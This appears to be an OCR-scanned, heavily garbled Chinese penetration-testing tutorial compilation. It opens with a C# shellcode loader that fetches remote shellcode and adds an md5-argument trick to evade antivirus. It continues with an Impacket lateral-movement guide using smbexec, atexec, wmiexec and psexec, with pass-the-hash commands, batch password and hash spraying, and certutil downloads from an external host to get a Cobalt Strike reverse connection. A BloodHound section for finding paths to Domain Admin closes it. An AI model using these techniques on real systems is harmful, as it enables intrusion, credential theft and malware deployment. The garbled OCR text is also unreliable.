hThread - CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 
WaitForSingleObject(hThread, OxFFFFFFFF); 
J 

private static UInt32 MEM COMMIT = 0х1000; 
private static UInt32 PAGE EXECUTE READWRITE = 0x49; 
[DllImport("kernel32")] 

private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, 
UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 
[DllImport("kernel32")] 

private static extern bool VirtualFree(IntPtr lpAddress, 
UInt32 dwSize, UInt32 dwFreeType); 
[Dllimport("kernel32")] 

private static extern IntPtr CreateThread( 
UInt32 lpThreadAttributes, 
UInt32 dwStackSize, 
UInt32 lpStartAddress, 
IntPtr param, 
UInt32 dwCreationFlags, 
ref UInt32 lpThreadId 
); 
[DllImport("kerne132")] 

private static extern bool CloseHandle(IntPtr handle); 
[Dllimport("kernel32")] 

private static extern UInt32 WaitForSingleObject( 
IntPtr hHandle, 
UInt32 dwMilliseconds 
); 
[Dllimport("kernel32")] 
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-ivate static extern IntPtr GetModuleHandle( 


rt ("kernel32")] 
ivate static extern UInt32 GetProcAddress( 


sort ("kerne132")] 


| private static extern UInt32 LoadLibrary( 
у lpFileName 


Import ("kerne132")] 
private static extern UInt32 GetLastError(); 


二 个 简单 的 执行 shellcode 的 demo， 由 于 shelicode 特 征 太 明显 ， 但 是 碰 上 杀 软 肯定 会 被 查 
我 们 需要 对 shellcode 做 一 点 处 理 。 


: shellcode 处 理 


的 byte 格 式 的 shellcode 太 容易 被 识别 ， 那 么 我 们 可 以 使 用 远程 加 载 shellcode 的 方式 ， 避 免 主 程 
екеуі) 被 杀毒 软件 查 杀 ， 我 们 要 保证 主 程序 是 一 个 干净 的 、 无 害 的 程序 ， 只 作为 一 个 加 载 


ETA: 


ublic static string GetUrl(string u) 


{ 

String url = u; 
Uri uri = new Uri(url); 

WebRequest req = WebRequest.Create(uri); 
WebResponse resp = req.GetResponse(); 
Stream stream = resp.GetResponseStream(); 
StreamReader sr = new StreamReader(stream); 
string str = sr.ReadToEnd(); 
return str; 

} 


调用 Geturl 并 将 string 转 成 byte: 
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string line = GetUrl(file); > ” 


var inputByteArray - new byte[line.Length / 2]; 

for (var x - 0; x « inputByteArray.Length; x++) 

í 
var i = Convert.ToInt32(line.Substring(x * 2, 2), 16); 
inputByteArray[x] - (byte)i; 


} 

byte[] shellcode = inputByteArray; 
StringBuilder build = new StringBuilder(); 
foreach (byte b in shellcode) 


{ 
build.Append(" 9х"); 
build.AppendFormat("{0:X2}", b); 


j 


通过 以 上 处 理 ， 我 们 可 以 执行 一 个 远程 文件 形 如 : fcaabbxx 的 shellcode 文 件 ， 该 文件 去 掉 了 
shellcode 的 0x。 在 主 程序 中 我 们 会 将 这 些 字符 串 再 度 转换 成 byte 格 式 的 0xfc，0xaa，Oxbb。 


0x03: 混淆 杀 软 


在 做 完 shellcode 处 理 后 ， 还 是 不 够 ， 仍 然 需要 扰乱 杀毒 软件 查 杀 ， 让 其 不 能 识别 出 我 们 执行 主 程序 
的 目的 。 下 面 简单 实现 一 种 bypass 的 姿势 。 


通过 对 比 md5 的 方式 执行 shellcode; 给 主 程序 添加 一 个 参数 入 口 ， 如 果 evil.exe -k md5 -f aaa.exe 
就 执行 shellcode。 意 思 是 当 输 入 的 -k 参 数 的 值 与 aaa.exe 的 md5 值 一 致 的 时 候 ， 那 么 执行 
shellcode, 





获取 md5 值 : 
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- static string GetMD5(string s) с са 
{ 

string hash = ""; 

try 


FileStream file = new FileStream(s, FileMode.Open); 
MD5 md5 - new MD5CryptoServiceProvider(); 

byte[] retval - md5.ComputeHash(file); 
file.Close(); 


StringBuilder sc - new StringBuilder(); 
for (int i = 0; i < retval.Length; i++) 
{ 

sc.Append(retval[i].ToString("x2")); 


hash = sc.ToString(); 
Console.WriteLine("XfFMD5: {0}", sc); 


} 
catch (Exception ех) 
( 
Console.WriteLine(ex.Message) ; 
} 


return hash; 
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应 用 程序 BE |2 





Iv ТААЗ с) 





ЖЕН 52 Cry 使 





Windows defender: 











` 


192.168.169.159 
192.168.169.179 
192.168.169.179 
192.168.169.179 
192.168.169.179 


Administrator * 


defender 
defender 
defender 
defender 








BYPASSAV 
DESKTOP-740718L 
DESKTOP-74D7/8L 
DESKTOP-74D718L 
DESKTOP-74D718L 





























3672 
3896 
4164 
4784 
4820 








49s 
6m 
32m 
32m 
315 


05: 小 结 与 思考 AER. 





将 shellcode 藏 在 图 片 里 面 ， 从 图 片 里 面 提取 shellcode 处 理 然后 执行 。 或 者 我 们 可 以 写 一 些 加 密 
去 ， 让 远程 传 入 shellcode 文 件 不 能 被 识别 或 者 执行 的 时 候 解密 执行 不 被 杀 软 发 现 。 
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命令 与 控制 - C2 研 发 


1669 





1670 


? 
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Impacket 套 件 之 远程 命令 执行 功能 讲解 


Impacket 官 方 介绍 为 用 于 处 理 网 络 协议 的 Python 类 的 集合 ， 该 集合 包含 了 渗透 测试 中 常见 的 工具 种 
类 ， 包 括 远程 命令 执行 、 信 息 收 集 、 票 据 传递 、 赁 据 获 取 、 中 间 人 攻击 测试 等 。 该 套件 里 的 工具 使 
用 也 是 iinux 主 机 跳 向 windows 主 机 的 方式 之 一 。 


impacketB 75 CE 


由 于 原 工具 为 python 脚 本 ， 在 某 些 linux 系 统 渗透 测试 环境 不 支持 或 某 些 渗透 测试 人 员 需 要 在 
windows 上 使 用 该 套件 内 工具 ， 为 解决 该 通用 性 问题 ， 已 有 和 人 打包 好 相应 的 执行 程序 ， 仓 库 地 址 为 


本 篇 文章 主要 讲解 Impacket 套 件 内 远程 命令 执行 工具 在 实际 工作 中 的 使 用 ， 其 中 包含 全 交互 式 工具 
(通常 适用 于 内 网 环境 下 或 socks 代 理 环境 下 )、 半 交互 式 工具 (通常 适用 于 webshell 环 境 下 )。 应 用 环 
境 如 下 。 


1. 已 有 权限 主机 (包含 webshelj) 不 可 出 外 网 。 
1. 已 获取 到 一 些 NTLM 哈 希 字符 串 ， 但 解 不 出 明文 密码 ， 无 法 通过 ipc、rpd 等 登陆 目标 主机 。 


1. 已 有 权限 主机 可 以 出 网 ， 但 出 于 某 些 原因 需要 在 socks 代 理 或 端口 转发 的 环境 下 进行 内 网 渗透 
测试 。 


Impacket 套 件 里 远程 命令 执行 工具 均 支 持 密码 、NTLM、 票据 认证 ， 本 文 将 会 讲 到 密码 和 NTLM 的 使 
用 方式 ， 票 据 认 证 使 用 方式 会 在 后 续 Impacket 票 据 工 具 使 用 中 详细 讲解 。 


以 下 测试 环境 为 





已 有 权限 主机 : 192.168.3.144 (win2012) 

目标 主机 : 192.168.3.76 (win8.1) 

测试 反弹 、 下 载 外 网 vps ip: 10х.хх.хх.х? 

已 掌握 情况 为 :当前 已 获取 部 分 ntIm 哈 希 、 密 码 ， 并 尝试 内 网 横向 扩展 。 
已 获取 域 管 账号 密码 : rootkit/administrator айтїп!@#45 


192.168.3.76 系 统 密码 为 : Win2008, NTLM hashADF92E298362E3E180ECOEE7226AFB825 


0x01 smbexe 


smbexe 为 全 交互 式 工具 ， 所 以 不 可 用 于 webshell 环 境 ， 可 用 于 rdp 等 有 交互 环境 登录 使 用 或 socks 代 
理 环境 下 使 用 。 
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gen 境 独 立 于 本 篇 文章 测试 环境 ， 仪 为 说 明 ， 本 篇 文章 内 Impacket 工 具 使 用 认证 的 账号 rid 必 
须 为 500， 从 winows 2008 开 始 (包括 2008)， rid 不 为 500 的 用 户 ，windows 都 不 允许 远程 连接 (包括 
net uses at. winrm 等 )， 所 以 如 果 想 对 目标 机 远程 执行 命令 ， 必 须 使 用 目标 机 rid 500 的 账号 (通常 为 
administrator) 8 管 账号 。 


| — 发 现 该 用 户 处 于 administrators 组 


2019/9725 FẸ 11:31:14 
20191146 下 午 11:31:14 
2019/9725 F T. 11:31:14 
Yes 
Yes 


主 部 


A —— 


(Т 


全 部 


Administrators 
*None 


C:\Users Administrator? 





如 下 图 执行 以 下 两 条 操作 ， 可 发 现 使 用 管理 组 账号 wrw 进 行 smbexec.py 远 程 执行 命令 操作 会 提示 权 
限 不 足 。 


python smbexec.py ./administrator:Win20080192.168.229.157 


python smbexec.py ./wrw:Win20080192.168.229.157 
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:~/Desktop/tools/impacket/examples# python smbexec.py ./administrator:y 
1п2008@192.168.229.157 


Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 


[!] Launching semi-interactive shell - Careful what you execute 
C:NWindowsNsystem32»whoami 
nt authority\system 


C:\Windows\system32>[ - ] 

/Desktop/tools/impacket/examples# python smbexec.py ./wrw:Win2008@192 
.168.229.157 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 





[-] DCERPC Runtime Error: code: 0x5 - rpc s access denied 
с; МЕРЕ: Ç uU - z 
以 下 内 容 继续 在 测试 环境 测试 


在 socks 网 络 环 境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 NTLM hash 认 证 对 远程 主机 192.168.3.76 
执行 命令 ，smbexec 产 生 一 个 伪 交 互 的 cmd shell 


smbexec.exe -hashes :DF92E298362E3E180ECOEE7226AFB825 
./administrator@192.168.3.76 


Application Target 





在 socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 域 管 账号 NTLM hash 认 证 对 远程 主机 
192.168.3.76 执 行 命令 ，smbexec 产 生 一 个 伪 交 互 的 cmd shell 





smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c 
rootkit/administrator@192.168.3.76 
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fg Proxifier 


file моне Log View Нер 








在 Socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 域 管 账号 密码 认证 对 远程 主机 
192.168.3.76 执 行 命令 ，smbexec 产 生 一 个 伪 交 互 的 cmd shell 


smbexec.exe rootkit/administrator:admin!94450192.168.3.76 





f Proxifier 
File Profile Log View Help 
ше 5 ШӘ j 

i 
Application Target 
, 
тууаге,ехе 
с 
Ç smbexe e ü 
i 
i 
al: Connecti ial. d 














Í mao 


在 socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifien)， 使 用 local 主 机 密码 认证 对 远程 主机 
192.168.3.76 执 行 命令 ，smbexec 产 生 一 个 伪 交 互 的 cmd shell 


Smbexec.exe ./administrator:Win20080192.168.3.76 
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Kg Proxifier 


File Profile Log View Help 





在 交互 shell 下 ， 下 载 可 执行 程序 (msf、cs 等 任意 文件 ) 


certutil -urlcache -split -f http://10x.Xx.Xx.x7:8080/1ib8.exe 


CONNECT) 








关于 certutil 使 用 请 查看 gitpook 文 章 


1.12.15.1. Metasploit 系 列 教程 第 十 五 季 一 一 certutil 一 句 话 下 载 payload 补 充 


0x02 atexec 


atexec 是 通过 windows 计 划 任 务 执行 远程 命令 ，atexec 是 一 个 半 交 互 的 工具 ， 即 参数 中 添加 需要 在 
远程 主机 执行 的 命令 ， 工 具 执行 后 即 返回 命令 结果 ， 适 用 于 webshell 下 ， 也 适用 于 其 他 网 络 环境 。 


某 些 情况 下 ， 当 获取 到 webshell 之 后 ， 发 现 该 主机 不 可 出 外 网 ， 且 无 法 创建 内 网 代理 ， 只 能 通过 
webshell 进 行内 网 渗透 测试 ， 








如 下 图 在 蚁 剑客 户 端 运行 ateXec， 在 远程 机 器 上 执行 任意 命令 
М 
ғехес.ехе ./administrator:Win20080192.168.3.76 "whoami" 
a { 
| atexec. exe ./administrator :Win20080192.168.3.76 "ipconfig" 


中 国 蚁 剑 = 





192.168.3.144 


ram Files\Microsoft\Exchange ServerNV15NFrontEndNHt tpProxy \owa\auth> 





Program Files\Microsoft\Exchange Server\V15\ProntEnd\it tpProxy \owa\auth> 


如 果 网 络 环境 为 已 有 内 网 socks 代 理 环境 ， 在 socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifier)， 可 
使 用 密码 认证 对 远程 主机 192.168.3.76 执 行 命令 


atexec.exe ./administrator:Win20080192.168.3.76 "whoami" 


mimikatz -min.x86.dll 
A 


File Profile Log View Нер 





在 Socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 NTLM hash 认 证 对 远程 主机 192.168.3.76 
执行 命令 


atexec.exe -hashes :DF92E298362E3E180ECOEE7226AFB825 
-/administrator@192.168.3.76 "whoami" 


Application Target Time Stat, 
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在 socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 域 管 帐户 密码 认证 对 远程 主机 
192.168.3.76 执 行 命令 ， 下 载 可 执行 程序 (如 msf、cs、 其 他 任意 文件 ， 如 密码 获取 、 信 息 收集 等 ) 


atexec.exe rootkit/administrator:admin!@#45@192.168.3.76 "certutil -urlcache 
split -f http://10x.xx.xx.x7:8080/1ib8.exe" 





在 上 图 下 载 可 执行 程序 情况 下 ， 使 用 域 管 帐户 密码 认证 远程 执行 该 程序 ， 使 主机 反 向 回 连 


atexec.exe rootkit/administrator:admin!(04450192.168.3.76 "lib8.exe" 


admin! 00845019271 


гар 
d ADMIN$\Temp \bGjzcBSV. tmp 





在 上 图 下 载 可 执行 程序 情况 下 ， 在 linux 主 机 下 ， 使 用 proxychains 代 理工 具 ， 使 用 atexec 远 程 执 行 该 
程序 ， u 


ЖЕЖ, admin!@#45 ИР BEE, AWARE. 


proxychains python atexec.py rootkit/administrator:admin\ !@#45@192.168.3.76 
"lib8.exe" 


:~/Desktop/tools/impacket/examples# proxychains python atexec.py rootki 
/administrator: admin\ !@#45@192.168.3.76 whoami 
ProxyChains-3.1 (http://proxychains.sf.net) 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 


[!] This will work LY on Windows »- Vista 
|5-сһаіп|-<>-103 17:15443-<><>-192.168.3.76:445-<><>-0К 


[*] Creating task NeUylQGLP 

[*] Running task NeUylQGLP 

[*] Deleting task. \eUyLQGLP 

[*] Attempting to read ADMIN$\Temp\eUylQGLP. tmp 
t.authority\system 





使 用 远程 主机 NTLM hash 认 证 对 远程 主机 192.168.3.76 执 行 命 


atexec.exe -hashes :518b98ad4178a53695dc997aa02d455c 
rootkit/administrator@192.168.3.76 "whoami" 
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Mat 
Mat 
ADMIN 1$ ' Sivek 





由 此 可 以 写 一 些 简单 bat 脚 本 ， 如 批量 对 内 网 机 器 遍历 做 hash 传 递 验证 、 指 定 主机 ntlm hashi 5 3& 
守明 内 网 机 器 遍历 做 密码 验证 、 指 定 主机 密码 遍历 验证 。 


两 网 机 器 遍历 做 hash 传 递 验证 ,ips.txt 内 容 为 内 网 ip， 每 行 一 条 


FOR /F %%i (ips.txt) atexec.exe -hashes :DF92E298362E3E180ECOEE7226AFB821 


指定 主机 ntlm hash 遍 历 验证 ，hashes.txt 为 已 知 ntlm hash 内 容 ， 每 行 一 条 


FOR /F 906i (hashes.txt) atexec.exe -hashes %%і ./administrator@ 


内 网 机 器 遍历 做 密码 验证 ，passwords.txt 为 已 知 密码 内 容 ， 每 行 一 条 


FOR /F %%1 (passwords.txt) atexec.exe ./administrator:%%i@ 


定 主机 密码 遍历 验证 ,ips.txt 内 容 为 内 网 ip， 每 行 一 条 


FOR /F %%і (ips.txt) atexec.exe ./administrator:password123@%%i whoami 


0x03 wmiexec 





Wmiexec 是 一 个 即 有 全 交互 也 有 半 交 互 的 远程 命令 执行 工具 ， 可 运用 于 多 种 环境 ， 包 括 webshell 环 
境 、rdp 环 境 、socks 环 境 等 。 


在 webshell 下 ， 使 用 域 管 理 员 账号 密码 认证 对 远程 主机 192.168.3.76 执 行 命 


Мтіехес.ехе rootkit/administrator : admin! @#45@192.168.3.76 whoami 


1678 


= ш 


+ 192.168.3.144 192.168.3.144 


[T Ж 3 
(*) 输入 ashelp 查看 本 地 命令 
C:\Program Piles\Microsoft\Exchange Server\V15\ProntEnd\t tpProxy \owa\auth> 


C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\Ht tpProxy\owa\auth> Е 


在 socks 网 络 环境 下 {图 中 所 示 socks 工 具 为 proxifier)， 使 用 NTLM HASH 认 证 对 远程 主机 
192.168.3.76 执 行 命令 


wmiexec.exe -hashes :DF92E298362E3E180ECOEE7226AFB825 
./administrator@192.168.3.76 whoami 





fe 
File Profile Log View Help 


1 RR о! 





在 socks 网 络 环 境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 NTLM HASH 认 证 对 远程 主机 
192.168.3.76 执 行 命令 ，wmiexec 产生 一 个 伪 交 互 的 cmd shell 


wmiexec.exe -hashes :DF92bE298362E3E180ECOEE7226AFB825 
./administrator@192.168.3.76 
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A 


File Profile log View Help 





£ 











在 linux 主 机 下 ， 使 用 proxychains 代 理工 具 ， 使 用 wmiexec 对 远程 主机 192.168.3.76 执 行 命令 


proxychains python wmiexec.py rootkit/administrator:adminN!@#450192.168.3.76 
whoami 


:~/Desktop/tools/impacket/examples# proxychains python wmiexec.py rootk 
it/administrator: admin\ !@#45@192.168.3.76 whoami 
ProxyChains-3.1 (http://proxychains.sf.net) 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 


|S-chain| PET XB 192.168.3.76:445-«»«»- OK 
[+] SMBv3.0 dialect used 

|5 -сһаіп | -<>-19 7:15443-<><>-192.168.3.76:135-<><>-0К 
|S-chain|-<>-1 7:15443-«»«»-192,168.3.76:49154- «»«»- OK 
rootkitNadministrator 





在 socks 网 络 环境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 帐号 密码 认证 对 远程 主机 192.168.3.76 执 


行 命令 


Wmiexec.exe ./administrator :Win2008@192.168.3.76 whoami 





Wmiexec 也 与 atexec 一 样 ， 可 写 脚 本 批量 执行 命令 


0x04 psexec 




















impacket 套 件 内 的 psexec 是 一 个 即 有 全 交互 也 有 半 交互 的 远程 命令 执行 工具 ， 可 运用 于 多 种 环境 ， 
包括 webshell 环 境 、rdp 环 境 、socks 环 境 等 。 
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psexec.exe 始 于 微软 的 pstools 套 件 (官方 说 明 
» 用 于 管理 员 远程 管理 windows 主 机 资产 ， 在 渗透 测试 中 也 经 
常用 来 对 远程 计算 机 执行 命 


与 微软 官方 的 psexec.exe 做 对 比 ， 官 方 psexec.exe 执 行 远 程 命令 会 在 远程 主机 创建 一 个 PSEXEC 的 
服务 ， 并 且 命 令 执行 后 会 一 直 存 在 ， 容 易 被 管理 人 员 发 现 并 判断 有 入 侵 行为 。impacket 套 件 内 的 
psexec， 执 行 命令 之 后 会 删除 对 应 的 服务 ， 隐 蔽 性 更 佳 ， 而 且 impacket 套 件 内 的 psexec 支 持 
PTH{ 哈 希 传 递 )。 


与 官方 psexec 相 同 ，impacket 套 件 内 的 psexec 也 支持 "-c" 参 数 ， 参 数 解 释 如 下 ， 即 复制 本 地 可 执行 
文件 到 远程 主机 并 执行 


-C pathname copy the filename for later execution, arguments are passed ir 


b 


下 文 所 讲述 的 是 impacket 套 件 内 的 psexec 使 用 方法 
在 linux 主 机 下 ， 使 用 proxychains 代 理工 具 ， 使 用 psexec.py 远 程 执 行 命令 


proxychains python psexec.py ./administrator:Win20080192.168.3.76 


/Desktop/tools/impacket/examples# proxychains python psexec.py . 
nistrator:Win2008@192.168.3.76 
ProxyChains-3.1 (http://proxychains.sf.net) 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 


-chain|-<>- ы» .. 15443-<><>-192.168.3.76:445-<><>- 


Requesting shares on 192.168.3.76 

Found writable share ADMIN$ 

Uploading file nXMmMXCP.exe 

Opening SVCManager on 192.168.3.76 

Creating service rwzH on 192.168.3.76 

Starting service rwzH 

-сһаіп|-<>-10 7:15443-<><>-192.168.3.76:445-<><>- 

|S-chain|-<>-1 : 15443-<><>-192.168.3.76:445-<><>- 
[!] Press help for extra shell commands 
|S-chain|-<>- 103 aia 17 : 15443-<><>-192.168.3.76:445-<><>- 
Microsoft windows [ ull 6.3.9600] 
(c) 2013 Microsoft Corporationiüflul[4* Ul; L/íú 


C:\Windows\system32>whoami 
nt authority\system 





在 psexec 执 行 过 程 中 ， 在 远程 主机 192.168.3.76 查 看 服务 ， 发 现 创 建 了 一 个 rwzH 的 服务 
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B И š Netuork Connection Broker 
Network List Service 
Network Location Avarenes: 
Network Store Interface Service 
Plug and Play 
Power 
Print Spooler 
Program Compatibility fs 


192.168.3. 
255.255. 


192.168 .3. 


Вепосе sktop Configuration 

Remote Services 

Remote Services UserMode Port Redirecd 
Remote Procedure Call <ЕРС» 
_(@CA378B1-C78C-—44E8 -AZAF-C9DCH264D48B RPC 
ruzH 
Security Accounts Manager 


indpoint Mapper 


Ғе8й::5еҒе:192.1 


Security Center 

Server 

Shell Hardware Detection 
Software Protection 

SSDP Discovery 


4 1 Superfetch 
localdomain 


.localdomain: 


System Event Notification Service 
System Events Broker 

Task Scheduler 

TCP/IP NetBIOS Helper 


psexec 执 行 完毕 后 ， 再 在 远程 主机 192.168.3.76 查 看 服务 ， 发 现 rwzH 服 务 已 不 存在 ，psexec 已 自动 
删除 自己 创建 的 服务 








m %4 
Bluetooth Pover 

Print Spooler 

Program Compatibility istant 

Remote D «top Configuration 

Remote D ; ices 

Remote D top ісе serMode Port Redirector 

Remote Procedure Call (RPC) 

RPC Endpoint Mapper 


192. Security Accoun Manager 


: 255.25 
192. 


Security Center 

Server 

Shell Hardware Detection 
Softua Protection 
SSDP 


isatap.C8CA37801-C78C-44E8-030 F-C9 DC8264D48B 


DNS 
ent Notification Service 

Events Broker 

neduler 


1Pv6 is os we = x $ Reg0::5efe:i192.1 


isatap.localdomain: Helper 
Broker 


localdonain User Profile Service 


УМоағе Alias Manager and Ticket Service 
UMvare To 





UMuare $7 





在 socks 网 络 环境 下 图 中 所 示 socks 工 具 为 proxifier)， 使 用 NTLM HASH 认 证 对 远程 主机 
192.168.3.76 执 行 命令 





PSexec.exe -hashes :DF92E298362E3E180ECOEE7226AFB825 
‘Yadministrator@192.168.3.76 "whoami" 
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在 linux 主 机 下 ， 使 用 proxychains 代 理工 具 ， 使 用 psexec.py 远 程 执行 命令 ， 注 意 密码 内 的 " "需要 转 
X 


proxychains python psexec.py rootkit/administrator:admin\ ! @#45@192.168.3.76 
whoami 


Desktop/tools/impacket/examples# proxychains python psexec.py rootki 
t/administrator:adminN !@#45@192.168.3.76 whoami 
ProxyChains-3.1 (http://proxychains.sf.net) 
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation 


|S-chain|-«»- T іі 15443-<><>-192.168.3.76:445-<><>-0Қ 


Requesting shares on 192.168.3.76 

Found writable share ADMIN$ 

Uploading file aRANhUjP.exe 

Opening SVCManager on 192.168.3.76 

Creating service FtHX on 192.168.3.76 

Starting service FtHX 
|5-сһаіп|-<>-10 :15443-<><>-192.168.3.76:445-<><>-0K 
|5-сһаіп|-<>-1 :15443-<><>-192.168.3.76:445-<><>-0K 
[!] Press help for extra shell commands 
|S-chain| -<>- ВВ: : 15443 -<><>-192.168.3.76:445-<><>-0K 
int authority\system[*] Process whoami finished with ErrorCode: Ө, ReturnCode: 

Opening SVCManager оп 192.168.3.76 


Stopping service FtHX 
Removing service FtHX 
Removing file aRANhUjP.exe 





下 面 使 用 "-c" 参 数 远程 加 载 可 执行 程序 ， 使 目标 主机 反 向 回 连 。 
execute.exe 放 到 与 psexec.exe 相 同 目录 。 
首先 创建 exe 可 执行 文件 服务 端 。 
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E — Windows Executable ooo 


Р enerates a Windows executable. Use ^ 
o p Arsenal scripts (Help -> Arsenal)to , | 


— _ s | [noni] 
4 | indows EXE "e 


—— [use x64 payload 


| Generate 





E 


" 络 环 境 下 (图 中 所 示 socks 工 具 为 proxifier)， 使 用 帐户 密码 对 远程 主机 192.168.3.76 执 行 命 


ec.exe rootkit/administrator: admin! @#45@192.168.3.76 -c execute.exe 


ШЕТІН F(A Ртл ѕ0скѕ 1 А Ўлргохійег), {МТМ HASH 认 证 对 远程 主机 
,3.76 执 行 命令 ， 使 用 "-c" 参 数 。 


с ехе -hashes :DF92E298362E3E180ECOEE7226AFB825 
ministrator@192.168.3.76 -c execute.exe 


findo \System32\cmd.exe - psexec.exe -hashes :DF92E298362E3E180ECOEE72. 一 口 X А 


^ 


File Profile Log View Help 


Application 
© psexec.exe 
© psexec.exe 


% psexecexe 





| © psexecexe 






I 图， 目标 主机 已 正常 回 连 ， 由 于 目标 主机 是 双 网 卡 主 机 ， 显 示 内 网 ip 为 另外 一 块 网 卡 的 ip。 
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EventLog X | Sites X | ProxyPivots X | Beacon 192 ^ 1% 186912716 X 
09/26 137120 *** t d acon om SYSTEM *@ (LENOVO-PC) 
09/26 04: pes еасо п SYSTEM 22 

09/26 04:37: Ses it om S OVO-PC) 
09/26 04:37: as к ) ол 4 RB40A7P JAQ5) 
09/2 6 ial 

09/26 

09/26 «ез Anitiat 
09/26 137:40 neolil 
69/26 :38:02 * ° * nt ted Wel і ром ety 
09/26 224 *** init beacon from Administrator *@192. (Ow. 
09/26 13118.*** initia еасоі om SYSTEM *0192,168.229,187 (PC-MICLE-KIT) 


如 果 执 行 的 命令 需要 耗费 比较 长 时 间 ， 或 加 载 可 执行 程序 ， 在 webshell 执 行 psexec.exe 可 能 会 收 不 
到 回 显 信息 (webshell 执 行 命令 有 超时 时 间 )， 所 以 建议 把 命令 执行 结果 写 到 一 个 文件 ， 然 后 查看 文 
件 内 容 即 可 。 


psexec.exe -hashes :0Ғ92Е298362ЕЗЕ180ЕС0ЕЕ7226АҒВ825 
./administrator@192.168.3.76 "netstat -an" >log.txt 


C:\Program Files\Microsoft\Exchange Server\V15\Pront£nd\Ht tpProxy\owa\auth> г 





C:\Program Files\Microsoft\Exchange Server\V15\ProntEnd\t tpProxy\owa\auth> + 


命令 执行 回 显 内 容 
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w8.9.17 - Copyright 2002- 





esting shares on 192. 
ADM 





> 
2 


@18 Core Security 


a.@.e:e 
,0,6.0:e 
0.0.8:€ 
.8.0,0:0 
г.е.ё:ё 
.8,6.08:6 
.@.@6.0:@ 
9.0:8 
,9,0.2:0 
9,0.9:8 


echnologie 
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bloodhound 技 术 讲 解 





工具 使 用 


环境 : 

kali 2019 vm 虚拟 机 

安装 : 

apt-get install bloodhound 

安装 完毕 后 启动 Neo4j 和 bloodhound 
neo4j console 

bloodhound 


访问 htto.Wiocalhost.7474 修 改 初始 密码 ， 然 后 登陆 bloodhound 


联动 cobaltstrike 


官方 地 址 : https://github.com/BloodHoundAD/BloodHound 
cs 插件 : http: “акті В.сот/Сбахх/Аа jre ` 


也 可 以 通过 sharpbound.exe 和 ps1 单 独 使 用 (execute-assembly. powershell-import) o 
导入 插件 ， 快 速 导 出 并 下 载 bloodhound 的 json 文 件 。 





选择 任意 可 用 选项 
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E SharpHound invoke-Bloodhound = О >x 


SharpHound Ingestor 
Arguments 
exec Method PowerPick ” 





使 用 powerpick 





在 View-->download 找 到 下 载 的 文件 


Cobalt Strike View Attacks Reporting Help 


COLE Б бәВво рава 


external 














号 入 zip 后 就 可 以 通过 各 种 关系 寻找 路 线 攻击 域 管 或 者 某 台 特定 机 器 
寻找 攻击 域 管 的 最 短路 径 : 
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i 
> 
ж 
E 


* » ° 
» 
гім Node Info 

22 + 
User info a 
Name ADMINISTRATORGDCLAB2019 COM 
Sessions Ф 
Sibling Objects in the Same QU 
Reachable High Value Targets m 
Effective inbound GPOs 4 

DOMAIN ADMINS@DCLAB2019 COM 

Group Membership i 
First Degree Group Memberships. 
Unrolled Group Membership eee 
Foreign Group Membership ө? 
Local Admin Rights 
First Degree Local Admin ... 
Group Delegated Local Admin Rights eee 2 
Derivative Local Admin Rights -.. d 
Execution Privileges 
First Degree RDP Privileges eee 
Group Delegated RDP Privileges eee 
First Degree DCOM Privileges oe 
Group Delegated DCOM Privileges 2. 
Constrained Delegation Privileges „ө. 
Outbound Object Control 
First Degree Object Control ... 
Group Delegated Object Control eee 
Transitive Object Control ceo _ 


ADMINISTRATOR@DCLAB2019.COM 


由 于 本 地 搭建 的 域 环境 没有 过 多 的 关联 信息 ， 所 以 不 能 很 好 看 出 各 台 机 器 的 关系 逻辑 。 
其 他 环境 效果 图 : 


Database Info 


DB Address bolt://localhost:7687 
DB User neo4j 
Users 532 
Computers 37 
Groups 14 
Sessions 10 


ACLs 5692 
Relationships 6325 


Clear Database 





查找 具有 DCSync 权 限 的 主体 
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Os 


EEE Li ias сте z Ф: ` =$ ` 


` 2.7 DOMAIN АОМІМЅ 2%, ж, 


еее” dts 
er by, 
d “© 
vete 
"T. 
P "ай 
ж Ed 
ertet 
= ENTERPRISE ADMINS@ 7» 8. ш 


ADMINISTRATOR@: ges, е) COM 





менед | 
@— DOMAIN CONTROLLERS@ "8:5. COM атын 
"m wt 
D > 
e. == Р 


ENTERPRISE DOMAIN CONTROLLERS S + ," COM 


Катя, 可 以 在 攻击 内 网 的 时 候 有 一 个 明确 的 路 线 ， 大 致 了 解 哪些 机 器 及 用 户 的 权限 是 存 
的 ， 还 可 以 通过 当前 所 获取 的 权限 去 判断 我 们 下 一 步 应 该 去 攻击 哪些 机 器 ， 当 前 的 权限 是 否 
机 器 有 着 session 交 互 。 


不 想 过 多 了 解 bloodhound 对 运行 机 制 ， 不 需要 自己 编写 语法 查询 ， 只 用 bloodhound 提 供 的 点 
。 那 么 只 需要 认识 几 个 图 形 所 代表 的 意义 及 一 些 使 用 技巧 : 
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Find all 


Domain Admins 


Find Shortest Paths to Domain Admins 


Find Principals with DCSync Rights 


Users with Foreign Domain Group Membership 


Groups with Foreign Domain Group Membership 


Map Domain Trusts 


Shortest Paths to Unconstrained Delegation Systems 


Shortest Paths from Kerberoastable Users 
Shortest Paths to Domain Admins from Kerberoastable Users 可 通过 Kerberoastabl 
Shortest Path from Owned Principals 
Shortest Paths to Domain Admins from Owned Principals 已 拥有 权限 到 域 管理 员 的 最 短 
Shortest Paths to High Value Targets 

两 个 关系 中 的 联系 解读 : 


鼠标 移动 到 路 径 并 出 现 内 光 时 ， 右 键 -->HELP。 


Pre-Built Analytics Queries rr di 


v 


жом 
Quenes 





